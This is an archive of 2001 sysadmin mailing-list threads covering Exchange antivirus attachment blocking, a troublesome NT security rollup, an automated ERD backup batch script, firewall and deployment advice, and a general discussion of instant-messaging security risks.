Great - where could I get said fix? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Randal, Phil [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 5:26 AM To: NT System Admin Issues Subject: RE: Exchange 5.5 and GroupShield It is supposedly fixed in Hotfix 7 for Groupshield 4.5. - Phil Randal Network Engineer Herefordshire Council Hereford, UK Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0?=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: MS Security Rollup
There's a note on the MS site indicating what to do before you run the rollup. The directions basically say to update everything in CIM before you do the patch. Once that's done - it should be a snap. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Chris Adrian [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 9:24 AM To: NT System Admin Issues Subject: RE: MS Security Rollup Damon Yeah, I had big problems on Compaq servers with array controllers. The rollup package overwrites scsiport.sys with a newer file which does not work correctly with certain array controllers giving lovely blue screens when you restart (Stop 0xA Blue Screen Error). Caused major panic with us until I found out what it was and used ERD Commander to copy the older file back into place. Now boots fine. Chris Adrian IT Department Scotland On Line -Original Message- From: Lee, Damon [mailto:[EMAIL PROTECTED]] Sent: 25 September 2001 13:29 To: NT System Admin Issues Subject: MS Security Rollup Hello all, Has anyone encountered any problems using the post MS SP6a Security Rollup Package? Damon Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0?=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Blue screen (ntoskrnl)
Here's the scripts: Each Sunday night at 0 dark thirty, this bath file runs: @echo off REM Created by Steve Clark - Clark Systems Support, LLC REM to automatically backup the registry and such REM Copies to \\server\drivers\erd\%computername% REM Date: 2/17/00 %windir%\system32/rdisk /s- if not exist d:\drivers\winnt\erd\%computername% md d:\drivers\winnt\erd\%computername% copy %windir%\repair\*.* d:\drivers\winnt\erd\%computername%\ The one time per month, I email the zip files to myself using BLAT REM This will email the ERD for all REM servers at office REM Created 6/10 by Steve Clark - Clark Systems Support, LLC REM -- d:\drivers\winnt\erd\pkzip.exe d:\drivers\winnt\erd\server.zip d:\drivers\winnt\erd\server\*.* c:\blat\blat c:\blat\erd.txt -s ERD's for office -t [EMAIL PROTECTED] -attach d:\drivers\winnt\erd\server.zip It may not be the prettiest solution but I now have the ERD's in my office, on the backup tape as well as on a different server than the source. As soon as I get a chance, I'll put these on my web site under links so you can review download whenever:) Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Krueger, Aaron G. - Lonesome [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 2:09 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) I once saw a script (that unfortunately I failed to keep) that would go to each server specified in a listing, and copy/create the ERD stuff to a central location, such that you could create an ERD for any server in the event that it went down. All that without any manual intervention (other than verifying and creating the physical floppy in the event). Anyone come across anything similar and 'free'? Aaron G. Krueger Sr. Network Analyst -Original Message- From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 12:02 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) I would like to see that batch file. _ Don Collier Network Administrator Intermap Technologies Inc. Voice: 303-708-0955 x-207 Fax:303-708-0952 [EMAIL PROTECTED] www.intermaptechnologies.com -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 4:40 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) Nice - welcome to the new company! I've got a batch process to create ERD's automatically if you're interested. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Stephen Moreau [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 6:46 PM To: NT System Admin Issues Subject: Re: Blue screen (ntoskrnl) Thanks for the info but I recently took over these servers (the admin before me quit) and he didn't maintain the erd. I tried the emergency repair process and told the process to look on the harddrives but it didn't work. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0?=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Installing IIS Patches
Title: RE: Installing IIS Patches I believe hyena will do this Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Roger Ali [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 3:21 PM To: NT System Admin Issues Subject: RE: Installing IIS Patches Hey Guys, Is there a tool or script out there that will allow for the batch creation of shares on our file server for the home folders of our users with full access rights for that user the domain admin group? Thanks Roger Ali Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Ideas for firewall
Netscreens are by far the easiest and best solution Ive seen. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martijn Eindhoven [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:55 AM To: NT System Admin Issues Subject: Ideas for firewall Hey Guys, I'm looking for a good firewall for about 50 w2k servers. What do you guys think is the best setup, per server or one dedicated firewall. And what is according to you guys the best firewall, i'm thinkin of a stateful one. Met vriendelijke groet, M. Eindhoven W2K System Administrator Bevelander Internet Services B.V. Folkstoneweg 10 1118 LM SCHIPHOL Zuidoost Tel : 020 40 53 900 Fax : 020 40 53 910 http://www.bevelander.nl = This communication contains information which is confidential and may also be privileged. It is for the exclusive use of the intended recipient(s). If you are not the intended recipient(s), please note that any distribution, copying or use of this communication or the information in it is strictly prohibited. If you have received this communication in error, please notify the sender immediately and then destroy any copies of it. = http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Push Instalation
Build the install using IEAK. If the PC's are NT4 or W2K Pro, use can St Bernard or something similar Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Ahmed Aboudeeb [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:47 AM To: NT System Admin Issues Subject: Push Instalation hi to all i need to install IE 5.5 to 100 users in our company, how can i do it as a Push Instalation from the server. i have an NT 4.0 domain, just NT 4.0 servers. thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: W2K Print to file
BFD - Ebay for $100. bottom line, why spend money on the product when he doesn't need to? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Michael W. Ellis [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:51 AM To: NT System Admin Issues Subject: RE: W2K Print to file Adobe Acrobat pricing from CDW: http://www.cdw.com/shop/products/default.asp?EDC=279808 http://www.cdw.com/shop/products/default.asp?EDC=279809 ($221.87 or $89.97 upgrade) Michael -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 6:31 PM To: NT System Admin Issues Subject: RE: W2K Print to file Yeah but adobe is like $400. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Mier, Juan [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:29 PM To: NT System Admin Issues Subject: RE: W2K Print to file You could also install Adobe Acrobat and print to that. That will produce a PDF file that you can then print anywhere or just read with Reader. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 4:26 PM To: NT System Admin Issues Subject: RE: W2K Print to file Couldn't you just map a fake printer to a file - it would then prompt the user for a location and a name for a bit more control. In other words, install a HP LJ II driver and send it to a file rather than a port. Is that what you're looking for? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Friday, September 21, 2001 7:04 PM To: NT System Admin Issues Subject: W2K Print to file We have a 16bit legacy application that runs reports to dot matrix printers. We'd like to redirect this output to a file. In Windows2000, can I configure an LPT port to redirect to a file? I've seen previous utilities like Lpt2file and Redirect. Are these still my best options? Thank you in advance. William http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Looking for a discussion on IM
Kevin thanks for your integrity and the info. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:35 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM You know, I violated a cardinal rule of mine - don't post something if you can't back it up. I did have a reference and now can't find it. I did find a similar exploit in the Yahoo messenger. I'm still pretty confident I did read about either a real attack via the icon, or at least a proof of concept, and I will keep looking for it. Anyway, the below is an exploit against an IM, so it shows it is vulnerable. From http://www.ca.com/virusinfo/encyclopedia/ Yahoo Pager/Messanger Buffer Overflow There is a buffer overflow problem with Yahoo Messenger that leaves the user vulnerable to remote attack. The problem arises due to a lack of appropriate bounds checking on the length of a URL that is received from another user inside a message. Unfortunately, due to this oversight, it is possible for unprivileged and possibly hostile remote users to execute arbitrary commands by overwriting the EIP (return address) and filling the URL with malevolent code. The hostile code could then be actioned when the unsuspecting target host clicks on the URL. -Original Message- From: Gordon W. Smith [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:07 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM OUCH! A virus in a smiley? Tell me more! I couldn't find anything about it. -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 7:50 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM Two things come to immediate mind: 1) Many IM clients allow for file transfer. Depending on your overall security policy this in itself can be an issue. Even if you allow people to transfer files, the IM client then becomes a point of security control. For example, with AIM, it is supposed to ask the user if it is ok if their chat partner sends them a file. How long do you think it will be before hackers manage to bypass that confirmation? Further, then they bad-guys could then just send a backdoor program to the hard disk. Or just pick up sensitive data from the computer. 2) There has already been at least one IM based virus - done by embedding malicious code in an icon smiley face. This becomes another area where the anti-virus vendors have to keep up. I'm sure there are other reasons as well, those are just the 2 that come to my mind before finishing my first cup of coffee. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Sunday, September 23, 2001 11:17 PM To: NT System Admin Issues Subject: Looking for a discussion on IM Hello, I have been asked to research and potentially implement IM for a company to communicate internally as well as externally. However, I have always heard that IM was evil and to close it down ASAP. I would like to hear real world implementation concerns/ tips as well as the security issues associated. Thanks in advance for your input. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Push Instalation
Excellent point. Isn't there someway of doing a staged install using a scheduler? Run the same install from the dummy logon which would resolve the security issue but have the first 10 kick off at 9:00, the 2nd at 9:15. ...? Never looked into this but it sounds interesting. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:58 AM To: NT System Admin Issues Subject: RE: Push Instalation Once you have the IE install setup and on a network share, you could do this the quick and dirty way. Create a dummy user account, give that account a logon script that calls the installer. Go to each WS, logon with that account and let it run. A couple of switches you will want with the IEAK is to use a non interactive mode install. That way once the installer launches, there are no questions asked. It just goes. The other is tell it to reboot after install. Granted this wouldn't work very well on a large network, but with a 100 machines, you could knock this out in an hour. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:52 AM To: NT System Admin Issues Subject: RE: Push Instalation Build the install using IEAK. If the PC's are NT4 or W2K Pro, use can St Bernard or something similar Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Ahmed Aboudeeb [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:47 AM To: NT System Admin Issues Subject: Push Instalation hi to all i need to install IE 5.5 to 100 users in our company, how can i do it as a Push Instalation from the server. i have an NT 4.0 domain, just NT 4.0 servers. thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Looking for a discussion on IM
Cool link thanks! Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Murray, Christopher L. [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 10:03 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM A good page for finding info on this is www.infosyssec.com It has a like there to the ICAT metabase of vulnerabilities -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:55 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM Kevin thanks for your integrity and the info. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:35 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM You know, I violated a cardinal rule of mine - don't post something if you can't back it up. I did have a reference and now can't find it. I did find a similar exploit in the Yahoo messenger. I'm still pretty confident I did read about either a real attack via the icon, or at least a proof of concept, and I will keep looking for it. Anyway, the below is an exploit against an IM, so it shows it is vulnerable. From http://www.ca.com/virusinfo/encyclopedia/ Yahoo Pager/Messanger Buffer Overflow There is a buffer overflow problem with Yahoo Messenger that leaves the user vulnerable to remote attack. The problem arises due to a lack of appropriate bounds checking on the length of a URL that is received from another user inside a message. Unfortunately, due to this oversight, it is possible for unprivileged and possibly hostile remote users to execute arbitrary commands by overwriting the EIP (return address) and filling the URL with malevolent code. The hostile code could then be actioned when the unsuspecting target host clicks on the URL. -Original Message- From: Gordon W. Smith [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:07 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM OUCH! A virus in a smiley? Tell me more! I couldn't find anything about it. -Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 7:50 AM To: NT System Admin Issues Subject: RE: Looking for a discussion on IM Two things come to immediate mind: 1) Many IM clients allow for file transfer. Depending on your overall security policy this in itself can be an issue. Even if you allow people to transfer files, the IM client then becomes a point of security control. For example, with AIM, it is supposed to ask the user if it is ok if their chat partner sends them a file. How long do you think it will be before hackers manage to bypass that confirmation? Further, then they bad-guys could then just send a backdoor program to the hard disk. Or just pick up sensitive data from the computer. 2) There has already been at least one IM based virus - done by embedding malicious code in an icon smiley face. This becomes another area where the anti-virus vendors have to keep up. I'm sure there are other reasons as well, those are just the 2 that come to my mind before finishing my first cup of coffee. -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Sunday, September 23, 2001 11:17 PM To: NT System Admin Issues Subject: Looking for a discussion on IM Hello, I have been asked to research and potentially implement IM for a company to communicate internally as well as externally. However, I have always heard that IM was evil and to close it down ASAP. I would like to hear real world implementation concerns/ tips as well as the security issues associated. Thanks in advance for your input. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Ideas for firewall
Dont forget to get the software subscription service. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Patrick Straub [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 10:18 AM To: NT System Admin Issues Subject: RE: Ideas for firewall I agree with you. The start versions NS5 is also really cheap (about 550$; don't really know to price in US$ as I leave in Switzerland). Patrick Straub / Systems Engineer / OfficeCom --- ECON!S AG / eBusiness Solutions - Electronic Business Solutions - Network and Office Solutions - Consulting and Projectmanagement Neumattstrasse 7 / CH 8953 Dietikon / Switzerland Phone ++41 (0) 1 744 73 73 Direct ++41 (0) 1 744 73 39 Fax ++ 41 (0) 1 744 73 99 mailto:[EMAIL PROTECTED] http://www.econis.com/ --- -Original Message- From: Keith Johnson [mailto:[EMAIL PROTECTED]] Sent: Montag, 24. September 2001 15:55 To: NT System Admin Issues Subject: RE: Ideas for firewall NetScreen...Great solution! Here's a reseller link: www.firstnetsecurity.com good bunch to work with Keith Johnson Information Systems Manager Pulaski County DSS [EMAIL PROTECTED] Voice - 540.980.7920 Fax - 540.980.7993 -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:33 AM To: NT System Admin Issues Subject: RE: Ideas for firewall Netscreen's are by far the easiest and best solution I've seen. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martijn Eindhoven [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:55 AM To: NT System Admin Issues Subject: Ideas for firewall Hey Guys, I'm looking for a good firewall for about 50 w2k servers. What do you guys think is the best setup, per server or one dedicated firewall. And what is according to you guys the best firewall, i'm thinkin of a stateful one. Met vriendelijke groet, M. Eindhoven W2K System Administrator Bevelander Internet Services B.V. Folkstoneweg 10 1118 LM SCHIPHOL Zuidoost Tel : 020 40 53 900 Fax : 020 40 53 910 http://www.bevelander.nl = This communication contains information which is confidential and may also be privileged. It is for the exclusive use of the intended recipient(s). If you are not the intended recipient(s), please note that any distribution, copying or use of this communication or the information in it is strictly prohibited. If you have received this communication in error, please notify the sender immediately and then destroy any copies of it. = http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: SirCam Virus Problem Exchange Server
You can clock all email from @home.com in the IMC. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 11:22 AM To: NT System Admin Issues Subject: SirCam Virus Problem Exchange Server Our webmaster seems to have found a friend who apparently doesn't know she has the SirCam virus. We're being sent hundreds of emails from this one account to our webmaster. We've set up a rule to forward all these emails to our webmasters delete folder, but apparently that's creating problems as well. Our webmaster doesn't want us to shut down that alias, so does anyone have any other ideas to somehow eliminate the problem. All the email is coming from an address at HOME.COM. Murray http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
mail loop
Stu Will you please kill the Quick Question loop. Ive gotten about 20 of them in the last 10 minutes. Thanks. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Get Me Off the List, Please
So get a clue and look at the footer http://lyris.sunbelt-software.com/scripts/lyris.pl Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Lance Klindt [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:06 PM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please Me THree? I want to be PULLED Please... for the love of GOd 3 or 4 post an hour would be fine not.. 3 or 4 a f*cking Min. -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 2:23 PM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please http://lyris.sunbelt-software.com/scripts/lyris.pl -Original Message- From: Maas [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 12:18 PM To: NT System Admin Issues Cc: [EMAIL PROTECTED] Subject: Get Me Off the List, Please [EMAIL PROTECTED] please remove the address above from the list server thank you...in over my head here http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: mail loop
Title: Message Thanks martin. Ive got some coal for your stocking. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 5:40 PM To: NT System Admin Issues Subject: RE: mail loop Nice try but no cigar! :) -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 2:27 PM To: NT System Admin Issues Subject: mail loop Stu Will you please kill the Quick Question loop. Ive gotten about 20 of them in the last 10 minutes. Thanks. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Exchange 5.5 and GroupShield
Groupshield 4.5 SP1 will allow you to block extensions as well as filenames. Are you using 4.5.1? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:58 PM To: NT System Admin Issues Subject: Exchange 5.5 and GroupShield Anyone know how to block BOTH specific file extensions and file names in GroupShield? Looks like it's an either or configuration so for example, I can't block all .vbs and wtc.exe without blocking all .exe files. Thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Print from scheduled batch file
Ok this is starting to sound familiar now. I got tired of working with the buggy task scheduler and invested $50 into AT 2000 from Cypress Technology. Ive used it on NT and 2K without problems. This was how I got around authentication problems from multiple processes that Scheduler would not handle. Sorry for the delay drain bamage. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dianne [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 8:42 PM To: NT System Admin Issues Subject: Re: Print from scheduled batch file The Task Scheduler won't allow you to change the login info for the service. It'sgreyed out. I thought there was a service called schedule but all I can find is task scheduler. It's been a while since I've worked with it. - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Monday, September 24, 2001 7:08 PM Subject: RE: Print from scheduled batch file make sure Scheduler service logs on with an account that has rights to printer -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 2:37 PM To: NT System Admin Issues Subject: Print from scheduled batch file I'm trying to automate reports from the new hfnetchk hotfix check tool. The goal is to have the reports on the printer once a week so I cancheck for any fixes that need to be applied. I have abatch file that works interactively, but when I run it through the scheduler, it will not print.Machine is nt4sp6a. Sounds permissions related, but I can't find where to change it. Any ideas or other suggestions? Thanks in advance. The command is hfnetchk -h server \\server\printshare OR hfnetchk -h server server.txt copy server.txt \\server\printer http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NT Backup
Hey Rocky - I seem to recall that NT Backup will not backup Exchange stores while they are running. The last time I looked into this, I came up with the soln of stopping/ restarting the services for the backup. Unfortunately, as you aware, Exchange sometimes takes a bit of time and the backup would not get the info stores. Buying anything today? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Rocky Stefano [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 8:01 PM To: NT System Admin Issues Subject: NT Backup Quick. I've never had to use NT backup on W2K for a client before. Well finally have one cheap enough that doesn't want to spring for Veritas so my question is. When you use the backup wizard and it asks if you want to backup everything on the machine, does that include the IS for Exchange as well. I know if I do it manually I can choose the IS manually. Thanks http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Get Me Off the List, Please
I agree that posting to this list is a cry for abuse. But on the other side, there are a lot of people that simply can't handle scanning email and deleting stuff that's off topic or not related to their function that minute. It's unfortunate that they don't understand the fact that even though the topic may be NT Backup, something that is being addressed may assist in their function. I can't tell you how much this list has added value - even the pissing contests of late with people. It's all in fun and trying to accomplish a common goal. Ok - let the jeering being! -Original Message- From: David N. Precht [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 8:42 PM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please The scariest part are the people how are this stupid, are somewhere either admins or wannabe admins... e -Original Message- From: Jesse E. Gardner [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 19:46 To: NT System Admin Issues Subject: RE: Get Me Off the List, Please For the life of me, I can't figure out why anyone would want to get off of this list. ??? :) Jesse E. Gardner, MCP P.O. Box 11431 Columbia, SC 29211 (803)216-0119 (803)216-0921 fax (803)361-4361 cell [EMAIL PROTECTED] -Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 3:32 PM To: NT System Admin Issues Subject:RE: Get Me Off the List, Please Get yourself off the list. The link is at the bottom of the email. -Original Message- From: Maas [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 12:18 PM To: NT System Admin Issues Cc: [EMAIL PROTECTED] Subject: Get Me Off the List, Please [EMAIL PROTECTED] please remove the address above from the list server thank you...in over my head here http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm _ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Exchange 5.5 and GroupShield
Ok inside the Groupshield properties, click on the tab On-Access. At the bottom of the page is another button and 3 radio buttons. No blocking, All attachments and specified attachments. When you click on select, there are 3 more radio buttons. None, block extensions and block filenames. I put info in both block extensions and block filenames. According to the info from NAI, this now blocks extensions and filenames. Please let me know if you need any more help. Regards, Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dianne [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 9:21 PM To: NT System Admin Issues Subject: Re: Exchange 5.5 and GroupShield Version is 4.5.572.128 Engine 4.0.70 - Original Message - From: Clark, Steve To: NT System Admin Issues Sent: Monday, September 24, 2001 7:41 PM Subject: RE: Exchange 5.5 and GroupShield Groupshield 4.5 SP1 will allow you to block extensions as well as filenames. Are you using 4.5.1? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:58 PM To: NT System Admin Issues Subject: Exchange 5.5 and GroupShield Anyone know how to block 